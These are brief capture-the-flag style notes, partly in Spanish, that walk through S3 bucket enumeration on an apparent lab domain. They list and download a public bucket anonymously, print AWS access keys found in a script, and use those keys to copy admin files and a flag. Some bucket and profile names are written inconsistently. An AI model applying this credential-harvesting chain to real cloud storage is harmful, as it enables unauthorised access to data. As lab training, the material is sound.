S3 Enumeration Basics

lazys3 "dev.huge-logistics.com"

echo "dev.huge-logistics.com" | flumberbuckets -si -

whatweb http://dev.huge-logistics.com

aws s3 ls s3://dev.huge-logistics.com --no-sign-request

aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive

aws s3 sync s3://dev.huge-logistics/admin --no-sign-request

aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

Como no tenemos las credenciales usamos el siguiente comando para bajar el archivo:

aws s3 cp s3://dev.huge.logistics.com/shared/hl_migration_project.zip . --no-sign-request

batcat migrate_secrets.ps1

$accessKey = “AKIA3SFMDAPOWOWKXEHU” $secretKey = “MwGe3leVQS6SDWYqlpe9cQG5KmU0UFiG83RX/gb9”

curl -I https://dev.huge-logistics.com | grep region | awk '{print $2}'

aws configure --profile awsebsuser

aws sts get-caller-identity --profile awsebuser

aws s3 ls s3://dev.huge.logistics.com/admin/ --profile awsebuser

aws s3 cp s3://dev.huge.logistics.com/admin/ . --profile awsebuser

aws s3 ls s3://dev.huge.logistics.com/migration-files/ --profile awsebuser

aws s3 cp s3://dev.huge.logistics.com/migration-files/test-export.xml . --profile awsebuser

batcat test-export.xml

Configuramos el usuario de nuevo

aws configure --profile awsebsuser

aws s3 ls s3://dev.huge.logistics.com/admin/ --profile awsebuser

aws s3 cp s3://dev.huge.logistics.com/admin/ . --recursive --profile awsebuser

cat flag.txt